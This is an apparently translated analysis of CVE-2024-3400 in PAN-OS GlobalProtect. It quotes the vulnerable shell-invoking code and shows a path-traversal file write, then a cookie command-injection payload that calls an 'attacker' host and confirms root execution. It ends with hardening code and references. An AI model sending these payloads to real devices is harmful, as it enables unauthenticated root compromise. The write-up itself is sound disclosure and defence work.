0x01 Vulnerability Description
0x02 Vulnerability Analysis
The `send_file` function of the device-telemetry helper (`dt_curl`) builds a curl command line as a string and hands it to `pansys` with `shell=True`:

```python
def send_file(logger, dbg, fname, dest_ip, key, signedUrl, capath):
    source_ip_str = get_source_ip(logger, dbg)
    # fname is interpolated unquoted into a shell command line
    if source_ip_str is not None and source_ip_str != "":
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s --interface %s" \
            % (signedUrl, fname, capath, source_ip_str)
    else:
        curl_cmd = "/usr/bin/curl -v -H \"Content-Type: application/octet-stream\" -X PUT \"%s\" --data-binary @%s --capath %s" \
            % (signedUrl, fname, capath)
    if dbg:
        logger.info("S2: XFILE: send_file: curl cmd: '%s'" % curl_cmd)
    # shell=True: the string is executed by /bin/sh, not passed as argv
    stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)
```
`pansys` is a thin wrapper around `dosys`, which ends up in `subprocess.Popen`:

```python
import subprocess
from StringIO import StringIO  # Python 2 module, as used by the original code

def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
    """call shell-command and either return its output or kill it
    if it doesn't normally exit within timeout seconds"""
    # Define dosys specific constants here
    PANSYS_POST_SIGKILL_RETRY_COUNT = 5
    # how long to pause between poll-readline-readline cycles
    PANSYS_DOSYS_PAUSE = 0.1
    # Use first_wait if time to complete is lengthy and can be estimated
    if first_wait == None:
        first_wait = PANSYS_DOSYS_PAUSE
    # restrict the maximum possible dosys timeout
    PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
    # Can support upto 2GB per stream
    out = StringIO()
    err = StringIO()
    try:
        if shell:
            cmd = command
        else:
            cmd = command.split()
    except AttributeError:
        cmd = command
    # With shell=True, cmd is passed verbatim to /bin/sh -c, so every shell
    # metacharacter inside it is interpreted
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                         stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
    # (remainder of dosys not shown on the page)
```
We can see that the command string is executed through subprocess.Popen, and the shell parameter will be True. This is unsafe because the command string is executed in the context of a Linux shell and therefore has access to shell features such as backticks, pipes and redirection, which is ideal for executing attacker-controlled input.
Arbitrary File Creation
The web server sets a SESSID cookie for unauthenticated sessions, and the data associated with the session cookie lives in /tmp/sslvpn.

```shell
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=test_data'
```

Checking the session directory confirms that our data has been written:

```text
$ ls -lha /tmp/sslvpn/session_test_data
-rw------- 1 root root 0 Apr 15 12:50 session_test_data
```
Testing showed that directory traversal bypasses the session_ prefix entirely, which yields an arbitrary empty-file write. The request may be a GET or a POST, as long as it is a well-formed HTTPS request to a valid endpoint.

```shell
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../hello_as_root'
```

```text
$ ls -lha /hello_as_root
-rw------- 1 root root 0 Apr 15 12:55 hello_as_root
```
Command Injection

The file name created through the traversal is later picked up by the device-telemetry job and becomes the `fname` argument of `send_file`, so shell metacharacters in the name reach the shell:

```shell
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'
```

After a short wait, we obtain remote code execution:

```text
$ ps auxfw
[..]
/usr/bin/python -t /usr/local/bin/dt_curl -i 35.184.126.116 -f /opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'
```

On the attacker machine, the Python web server receives a GET request showing that our code ran with root privileges:

```text
python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
192.168.50.226 - - [15/Apr/2024 19:00:17] "GET /?user=root HTTP/1.1" 200 -
```
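The two defences this analysis points at, as an added example (hypothetical names, not PAN-OS code): validate the SESSID-derived file name before it is joined to the session directory, and pass the curl invocation to subprocess as an argv list with shell=False so that backticks, `$(...)` and `${IFS}` in a file name are inert bytes rather than shell syntax.

```python
import os
import re
import subprocess

# Hypothetical names for illustration; this is not PAN-OS code.
SESSION_DIR = "/tmp/sslvpn"
# A session id is an opaque token: no '/', '.', '`', '$' or other metacharacters
SESSID_RE = re.compile(r"^[A-Za-z0-9_-]{8,128}$")

def safe_session_path(sessid, base_dir=SESSION_DIR):
    """Map a SESSID cookie to its session file, or raise ValueError.
    The allow-list regex refuses the traversal payloads shown above; the
    realpath check is defence in depth, keeping the file directly in base_dir."""
    if not SESSID_RE.match(sessid):
        raise ValueError("invalid session id")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, "session_" + sessid))
    if os.path.dirname(path) != base:
        raise ValueError("session id escapes the session directory")
    return path

def rejects_session_id(sessid, base_dir=SESSION_DIR):
    """True when safe_session_path refuses sessid."""
    try:
        safe_session_path(sessid, base_dir)
        return False
    except ValueError:
        return True

def build_curl_argv(signed_url, fname, capath, source_ip=None):
    """Hardened counterpart of send_file: the same curl invocation as an argv
    list. With shell=False, fname is one argument and never reaches /bin/sh."""
    argv = ["/usr/bin/curl", "-v",
            "-H", "Content-Type: application/octet-stream",
            "-X", "PUT", signed_url,
            "--data-binary", "@" + fname,
            "--capath", capath]
    if source_ip:
        argv += ["--interface", source_ip]
    return argv

def send_file_safely(signed_url, fname, capath, source_ip=None, timeout=250):
    """Run curl without a shell; the 250 s timeout mirrors the original."""
    return subprocess.run(build_curl_argv(signed_url, fname, capath, source_ip),
                          capture_output=True, timeout=timeout)
```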
0x03 Affected Versions
0x04 Vulnerability Details
https://security.paloaltonetworks.com/CVE-2024-3400
0x05 References
https://security.paloaltonetworks.com/CVE-2024-3400
CVE-2024-3400 | AttackerKB (attackerkb.com)
Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400) (watchtowr.com)
Originally published on the WeChat public account 山石网科安全技术研究院: Palo Alto Networks PAN-OS Command Injection Vulnerability Analysis (CVE-2024-3400)